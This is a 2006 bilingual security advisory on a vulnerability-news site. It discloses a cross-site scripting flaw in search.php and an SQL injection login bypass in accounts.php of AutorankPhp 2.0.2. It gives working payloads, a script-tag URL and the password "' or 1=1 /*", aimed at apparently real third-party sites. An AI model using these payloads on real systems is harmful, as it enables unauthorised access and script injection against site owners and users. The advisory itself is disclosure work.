Computer Security

Security Advisory: SQL-Injection in AutorankPhp 2.0.2
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [eVuln] Skull-Splitter's PHP Downloadcounter for Wallpapers SQL Injection

  [eVuln] Skull-Splitter's PHP Guestbook XSS Vulnerability

  XSS in PHPKIT Version 1.6.03

  [SA19443] PHP Script Index "search" Cross-Site Scripting Vulnerability

From:Cyber Lords <fear_(at)_cyberlords.net>
Date:29.03.2006
Subject:SQL-Injection in AutorankPhp 2.0.2

Advisory: SQL-Injection in AutorankPhp 2.0.2

Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting

Уязвимый скрипт/Vulnerable script: search.php

Exploit:

http://www.teifa.net/rank/search.php?key=<script>alert()</script
>&cat=Overall

Уязвимость/Vulnerability:
SQL-injection

Уязвимый скрипт/Vulnerable script: accounts.php

Exploit:

http://www.top48hours.com/autorankphp/accounts.php?login
Login - admin
Password - ' or 1=1 /*

--------------------------
Cyber Lords Team
www.cyberlords.net  

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru